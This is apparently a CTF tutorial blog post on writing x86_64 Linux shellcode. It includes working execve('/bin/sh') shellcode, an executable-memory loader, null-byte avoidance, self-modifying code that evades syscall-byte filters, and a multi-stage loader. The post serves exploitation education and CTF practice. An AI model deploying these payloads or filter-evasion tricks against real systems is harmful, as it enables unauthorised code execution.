I trust that whoever is reading this article is not a layman: you are probably familiar with CTFs, have overflowed a buffer and smashed the stack at least once, and know what you are getting yourself into. I assume you know what a CTF challenge is, the basics of x86 assembly, and how to use Linux.
The term “shellcode” comes from the usual objective of an exploit: executing a command shell such as /bin/sh. The code is written in assembly language.
# execve("/bin/sh", {NULL}, {NULL})
.intel_syntax noprefix
.text
.global _start
_start:
mov rax, 0x68732f6e69622f
push rax
push rsp
pop rdi
xor eax, eax
push rax
mov al, 59
push rsp
pop rdx
push rsp
pop rsi
syscall
Looking at this code for the first time is intimidating and scary, but once you learn how to read it, writing the shellcode becomes the easiest part of the job.
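The constant in the first mov is easier to read once it is decoded. As a minimal sketch (the helper name decode_imm is made up for illustration), this shows the bytes that push rax writes to memory on a little-endian machine:

```python
def decode_imm(value: int, width: int = 8) -> bytes:
    """Return the bytes a little-endian CPU stores for an integer immediate."""
    return value.to_bytes(width, "little")


if __name__ == "__main__":
    # Immediate taken from the first instruction of the shellcode above.
    print(decode_imm(0x68732F6E69622F))  # b'/bin/sh\x00'
```

The constant is only seven bytes long, so the eighth byte is zero and the string is already terminated.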
How does it execute
Shellcode is simply executable bytes: machine instructions assembled to perform a small task once control flow has been hijacked.
There are two broad families of computer architecture: Von Neumann, which stores code and data in the same memory, so code is just data, and Harvard, which stores code and data separately.
Almost all general-purpose architectures (x86, ARM, MIPS, etc.) are Von Neumann, and they are the focus of this article.
Starting out, we will use a simple shellcode loader to test and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()
int main(void) {
    // 1. Allocate an executable memory page.
    // PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
    // MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (page == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    printf("[+] Memory allocated at: %p\n", page);
    // 2. Read shellcode from standard input (stdin) into the allocated page.
    printf("[+] Reading shellcode from stdin...\n");
    ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
    if (bytes_read <= 0) {
        perror("read failed or no input provided");
        return 1;
    }
    printf("[+] Read %ld bytes. Executing now...\n", bytes_read);
    // 3. Create a function pointer to the page and call it.
    // This transfers execution to the shellcode.
    void (*shellcode_func)() = page;
    shellcode_func();
    // This line will likely not be reached if the shellcode exits.
    return 0;
}
Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
The mmap call is important. If we requested memory without PROT_EXEC, then the moment the program tried to execute the code at page, the CPU’s memory management unit would see the “No-Execute” permission on that page and trigger a protection fault, resulting in a SIGSEGV.
We are asking for a single page (0x1000 bytes) of memory that is:
- Writable: we load shellcode bytes into it using read.
- Executable: the CPU will happily jmp into it without complaining.
void *page = mmap(
    NULL, // Let the kernel choose the address
    4096, // One page = 4096 bytes (common page size)
    PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
    MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
    -1, // File descriptor (-1 since it's anonymous)
    0 // Offset (not used here)
);
The loader is not compiled with the default gcc configuration. By default, modern toolchains enable mitigations that get in the way of shellcode (stack canaries, a non-executable stack, PIE), so you need to disable them when compiling the program.
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Using checksec, we see Stack: Executable. That means data on the stack can be treated as code.
$ pwn checksec --file=execute
[*] '/tmp/test/execute'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
SHSTK: Enabled
IBT: Enabled
Stripped: No
Debuginfo: Yes
Writing Shellcode
Before I start writing shellcode, I open loads of documentation: syscall tables and the manual for whatever architecture I am targeting. To mention a few, I use Systrack's Linux kernel syscall tables for system call lookups, and Felix Cloutier’s x86 and amd64 instruction reference. It is easier to navigate, but the official Intel manual also works.
When writing shellcode, your goal is to execute syscalls (system calls). They are the special functions your program uses to talk to the kernel:
- read to ask the kernel to read from a file.
- write to ask the kernel to write to a file.
- execve to ask the kernel to run another program.
- exit to tell the kernel you are done and exit cleanly.
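Syscalls are functions and, like any other function, they take parameters. It is not as easy as function(arg1, arg2, arg3), but you learn to do it. The syscall number goes into the register listed under RETURN, which holds the return value afterwards. On x86 the call is triggered with int 0x80, on x64 with the syscall instruction.
Calling convention for the x86 and x86_64 architectures: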
| ARCH | RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 |
|---|---|---|---|---|---|---|---|
| x86 | eax | ebx | ecx | edx | esi | edi | ebp |
| x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 |
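To make the table concrete, here is a small sketch that turns a syscall number and its arguments into a register assignment. The names SYSCALL_ABI and plan_syscall are made up for illustration; the register order is copied from the table, and the syscall number goes into the register listed in the RETURN column.

```python
# Register order copied from the table above.
SYSCALL_ABI = {
    "x86": {"nr": "eax", "args": ["ebx", "ecx", "edx", "esi", "edi", "ebp"]},
    "x64": {"nr": "rax", "args": ["rdi", "rsi", "rdx", "r10", "r8", "r9"]},
}


def plan_syscall(arch: str, number: int, *args) -> dict:
    """Map a syscall number and its arguments onto registers for `arch`."""
    abi = SYSCALL_ABI[arch]
    if len(args) > len(abi["args"]):
        raise ValueError("a syscall takes at most six arguments")
    plan = {abi["nr"]: number}
    plan.update(zip(abi["args"], args))
    return plan


if __name__ == "__main__":
    # execve is syscall 59 on x64, as in the opening shellcode.
    print(plan_syscall("x64", 59, "path", "argv", "envp"))
    # {'rax': 59, 'rdi': 'path', 'rsi': 'argv', 'rdx': 'envp'}
```

This matches the opening shellcode, which loads 59 into al and points rdi, rsi and rdx at its three arguments.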
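To write shellcode, you look up the number of the syscall you want. The simplest example is the exit syscall. Looking it up in the man pages, you find this definition (it describes the C library wrapper, but the raw syscall takes the same single argument):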
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
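It takes only one parameter, the exit status. On Unix-like systems, a successful exit is exit(0), so let's write that in shellcode. Never mind the first 3 lines; they matter to the assembler, not to us in this case. Note that the snippet never loads rdi: it relies on rdi already being 0 when the process starts, which is what the strace output further down shows. In real shellcode, set it explicitly (for example with xor edi, edi).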
.intel_syntax noprefix
.global _start
_start:
mov rax, 60 # syscall for exit
syscall # invoke the syscall
Compile the shellcode using the following command.
gcc -nostdlib -static hello.S -o hello.elf
This creates an ELF file. Inspect its disassembly with objdump.
$ objdump -d -Mintel hello.elf
hello.elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c0 3c 00 00 00 mov rax,0x3c
401007: 0f 05 syscall
We only want the .text section of the ELF file. To extract it, use objcopy.
objcopy --dump-section .text=hello.bin hello.elf
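The extracted bytes usually end up pasted into an exploit script or a C array. A minimal sketch of that conversion follows; the helper names to_escaped and escape_file are made up for illustration, and hello.bin is the file produced by the objcopy command above.

```python
from pathlib import Path


def to_escaped(data: bytes) -> str:
    """Format raw bytes as an escaped string for C or Python literals."""
    return "".join(f"\\x{b:02x}" for b in data)


def escape_file(path: str) -> str:
    """Read a raw shellcode file (for example hello.bin) and escape it."""
    return to_escaped(Path(path).read_bytes())


# The nine bytes shown in the objdump listing above.
print(to_escaped(bytes.fromhex("48c7c03c0000000f05")))
# \x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05
```

The three \x00 bytes in the output are worth noticing: they are the kind of bytes that input filters tend to reject.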
Use xxd to view the raw bytes.
$ xxd hello.bin
00000000: 48c7 c03c 0000 000f 05                   H..<.....
You can run the ELF file just like any other Linux program. It exits with status 0. To check the status, run echo $?.
./hello.elf
echo $?
# 0
For more detail, use strace to see the syscalls being executed.
strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0) = ?
# +++ exited with 0 +++
Now, enough with the long introduction. Let's get into the notes.
Problems you would run into when writing shellcode
Here are some common problems that you will eventually run into when writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use as few bytes as possible.
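A quick way to keep an eye on the budget is to measure candidate encodings before committing to one. The sketch below compares a few equivalent instruction sequences; the byte encodings are the ones listed in the tips that follow, and the helper name cheapest is made up for illustration.

```python
# Equivalent ways to reach the same register state, with their machine code.
CANDIDATES = {
    "zero rax": {
        "mov rax, 0": bytes.fromhex("48c7c000000000"),
        "xor rax, rax": bytes.fromhex("4831c0"),
        # Writing eax clears the upper half of rax as well.
        "xor eax, eax": bytes.fromhex("31c0"),
    },
    "rax = 0xbadc0de": {
        "mov rax, 0xbadc0de": bytes.fromhex("48c7c0dec0ad0b"),
        "push 0xbadc0de; pop rax": bytes.fromhex("68dec0ad0b58"),
    },
}


def cheapest(options: dict) -> str:
    """Return the assembly text with the shortest encoding."""
    return min(options, key=lambda asm: len(options[asm]))


for goal, options in CANDIDATES.items():
    best = cheapest(options)
    print(f"{goal}: {best} ({len(options[best])} bytes)")
```

With these candidates the winners are xor eax, eax at 2 bytes and the push/pop pair at 6 bytes.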
XOR Instruction
Be careful not to overuse mov. To zero out a register, do not use mov; use xor instead. On x86_64, writing a 32-bit register clears the upper half of the 64-bit one, so xor eax, eax is enough to zero rax.
mov al,0x0 ; b0 00
mov ax,0x0 ; 66 b8 00 00
mov eax,0x0 ; b8 00 00 00 00
mov rax,0x0 ; 48 c7 c0 00 00 00 00
xor al,al ; 30 c0
xor ax,ax ; 66 31 c0
xor eax,eax ; 31 c0
xor rax,rax ; 48 31 c0
Push Pop
Push a value onto the stack and get it back with pop. For an immediate that fits in 32 bits, this is one byte shorter than mov.
;; 7 bytes
mov rax, 0xbadc0de ; 48 c7 c0 de c0 ad 0b
;; 6 bytes
push 0xbadc0de ; 68 de c0 ad 0b
pop rax ; 58
Use what you have
When you hijack the control flow (e.g. through jmp rax), the registers may already hold useful values. For example, if you need the read syscall and rdx already holds a non-zero value, use it as is for the count parameter. It is situation dependent, but you get the point.
Strings
If you think strings are hard in C, well let me introduce you to x86_64.
I will use the open syscall as an example.
# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f # "/flag" as a little-endian integer
push rbx # the string now lives on the stack
mov rax, 2 # open() syscall
mov rdi, rsp # point to first item on stack ("/flag")
mov rsi, 0 # second arg: flags = O_RDONLY (0)
syscall # open("/flag", O_RDONLY)
The value 0x67616c662f is /flag in little endian. To reproduce it, run the following command.
echo -ne "/flag" | rev | xxd -p
# 67616c662f
The downside is that long strings will not fit in a single register. Another way is to use a label. I prefer this way, but it does not always work: the string has to travel with the payload, and a short forward rip-relative displacement encodes null bytes.
# open("/flag", O_RDONLY)
push 2
pop rax # open syscall = 2
lea rdi, [rip+flag] # flag string
xor rsi, rsi # O_RDONLY = 0
syscall
flag:
.string "/flag"
There is also building the string on the stack. It almost always works, but it takes a lot more work.
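Part of that work can be scripted. The sketch below splits a string into 64-bit little-endian values and prints the instructions that push them, last chunk first. It is a simpler variant than the hand-written listing that follows: it uses mov with full immediates and makes no attempt to avoid null bytes. The helper names and the /etc/passwd path are made up for illustration.

```python
def stack_chunks(text: bytes) -> list:
    """Split a NUL-terminated string into 64-bit values, in push order."""
    data = text + b"\x00"
    data += b"\x00" * (-len(data) % 8)  # pad to a multiple of 8 bytes
    chunks = [
        int.from_bytes(data[i:i + 8], "little")
        for i in range(0, len(data), 8)
    ]
    return chunks[::-1]  # the stack grows down, so push the tail first


def emit_pushes(text: bytes) -> str:
    """Emit Intel-syntax assembly that leaves rsp pointing at the string."""
    lines = []
    for value in stack_chunks(text):
        lines.append(f"mov rax, {value:#x}")
        lines.append("push rax")
    return "\n".join(lines)


if __name__ == "__main__":
    print(emit_pushes(b"/etc/passwd"))
    # mov rax, 0x647773
    # push rax
    # mov rax, 0x7361702f6374652f
    # push rax
```

After the generated pushes, rsp points at the first character of the string, so it can be copied into rdi as in the earlier example.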
# open("/flag", O_RDONLY)
# push "flag" little endian to stack
push 0x67616C66
pop rax # rax = 0x0000000067616C66
# shift left 8 bits to make room for the '/' byte
shl rax, 8 # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop rbx # rbx = 0x...0000002F
# OR the '/' into the low byte
or rax, rbx # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax
push 2 # open syscall
pop rax
lea rdi, [rsp] # filename = "/flag"
xor rsi, rsi # flags = O_RDONLY
syscall
Input filtering
The input may be manipulated, or filtered for certain bytes, before it is executed.
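Before sending a payload, it is worth checking it against the filter offline. A minimal sketch, assuming the filter is a plain list of forbidden byte sequences (the helper name find_banned and the sample filter are made up for illustration):

```python
def find_banned(payload: bytes, banned: list) -> list:
    """Return (offset, sequence) pairs for every banned sequence in payload."""
    hits = []
    for seq in banned:
        start = payload.find(seq)
        while start != -1:
            hits.append((start, seq))
            start = payload.find(seq, start + 1)
    return sorted(hits)


if __name__ == "__main__":
    # mov rax, 60 ; syscall  (the exit example from earlier)
    payload = bytes.fromhex("48c7c03c0000000f05")
    # Hypothetical filter: no null bytes and no syscall opcode.
    for offset, seq in find_banned(payload, [b"\x00", b"\x0f\x05"]):
        print(f"offset {offset}: {seq.hex()}")
```

For this payload the sketch reports null bytes at offsets 4, 5 and 6 and the syscall opcode at offset 7, which are the spots the techniques in this section have to rewrite.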
String termination & null bytes
One great resource I found is nets.ec/Shellcode/Null-free, which has many great examples.
- Use the xor instruction instead of mov
This uses fewer bytes and does not include null bytes.
# bad
mov rax, 0
# good
xor rax, rax
- Use push and pop instructions instead of mov
push 0x70
pop rax
syscall
- Use shifting instructions
mov rdi, 0x68732f6e69622f6a ; 64-bit immediate, "j/bin/sh" in memory order, so no null byte
shr rdi, 8 ; shift out the junk 'j' byte; the top byte becomes 0 and terminates the string
push rdi ; the stack now holds "/bin/sh\0"
push rsp ; push current RSP (stack pointer)
pop rdi ; RDI now points at the pushed string
Self modifying shellcode
Once I was solving a CTF challenge that filtered the syscall bytes 0F 05. I wrote shellcode that constructs the 0F 05 bytes at runtime so they never appear in the input. The following code increments the 0E byte by 1 so it becomes 0F, and this way it bypasses the filter. It only works when the shellcode sits in writable memory.
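Why the filter misses it can be checked offline. The sketch below is a simulation, not the exploit itself: it assumes that inc BYTE PTR [rip] encodes as fe 05 00 00 00 00 (rip-relative with a zero displacement) and applies the same increment to a copy of the payload. The name run_inc_patch is made up for illustration.

```python
SYSCALL = b"\x0f\x05"

# Assumed encoding of the two lines of assembly:
#   inc BYTE PTR [rip]  -> fe 05 00 00 00 00
#   .byte 0x0e, 0x05    -> 0e 05
PAYLOAD = bytes.fromhex("fe05000000000e05")


def run_inc_patch(payload: bytes) -> bytes:
    """Simulate the inc: [rip] is the first byte after the 6-byte instruction."""
    patched = bytearray(payload)
    target = 6  # offset of the byte that follows the inc instruction
    patched[target] = (patched[target] + 1) & 0xFF
    return bytes(patched)


if __name__ == "__main__":
    print(SYSCALL in PAYLOAD)                 # False: the filter sees no 0f 05
    print(SYSCALL in run_inc_patch(PAYLOAD))  # True: it exists once the inc has run
```

Under that assumed encoding the payload still contains null bytes, so this exact form only helps against a filter that targets the syscall opcode. The assembly that performs the patch at runtime: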
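inc BYTE PTR [rip] # [rip] is the address of the next byte, the 0x0e below
.byte 0x0e, 0x05 # becomes 0f 05 (syscall) once the inc has run
NOP Padding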
nop is an instruction that does nothing. It is useful for padding, alignment, and similar purposes.
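Padding is often added from the exploit script rather than in the assembly source. A minimal sketch in Python, assuming the target expects a fixed-size buffer (the helper name pad_with_nops is made up for illustration):

```python
NOP = b"\x90"  # single-byte x86 nop


def pad_with_nops(shellcode: bytes, size: int, sled_first: bool = True) -> bytes:
    """Pad shellcode to exactly `size` bytes with nop instructions.

    sled_first=True puts the nops before the shellcode (a NOP sled),
    otherwise they are appended after it.
    """
    if len(shellcode) > size:
        raise ValueError("shellcode is larger than the target size")
    padding = NOP * (size - len(shellcode))
    return padding + shellcode if sled_first else shellcode + padding


if __name__ == "__main__":
    payload = pad_with_nops(bytes.fromhex("31c0"), 8)
    print(payload.hex())  # 90909090909031c0
```

In the assembly source itself, the equivalent looks like this: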
.global _start
_start:
# Your code here
nop
nop
#...
nop
.fill 10, 1, 0x90 # 10 NOP instructions
# or
.rept 10
nop
.endr
# More code here
Multi stage shellcode
Sometimes the input filtering makes it impossible to write shellcode that does anything meaningful. One way around this is multi-stage shellcode: write a stage 1 “loader” whose only job is to read in a second shellcode and jump to it. Only stage 1 has to pass the filter.
push 0
push 0
pop rax # read syscall
pop rdi # stdin
push rsp
pop rsi # rsi = rsp (buffer)
push 100
pop rdx # count = 100 bytes
syscall # read(0, rsp, 100)
jmp rsp # jump to stage 2 (the stack must be executable)
Use Pwntools when possible
It has lots of functions that automate and ease the process of writing shellcode. Sometimes you don’t need to write shellcode at all; it does it for you. But first you have to understand how the magic works, otherwise you will waste a lot of time. RTFM.
Pwn shellcraft
pwn shellcraft -l # List shellcodes
pwn shellcraft -l amd # Shellcodes with amd in the name
pwn shellcraft -f hex amd64.linux.sh # Print the shellcode as a hex string
pwn shellcraft -r amd64.linux.sh # Run to test. Get shell
Pwn template
I like to use the pwn template command to generate a starting point for my challenges. Then I use the asm("") function to write the shellcode in the script instead of compiling it and passing it by hand through the shell.
stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")
io.sendline(stage1)
pause(1)
io.sendline(stage2)
io.interactive()
GDB Debugger
Using a debugger is essential. gdb is good but lacks features, which is why I recommend using pwndbg or gef with it. They help with visualisation and provide functions that are useful for debugging.
gdbscript = f'''
# break points
#...
source /opt/gef/gef.py
continue
'''
References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html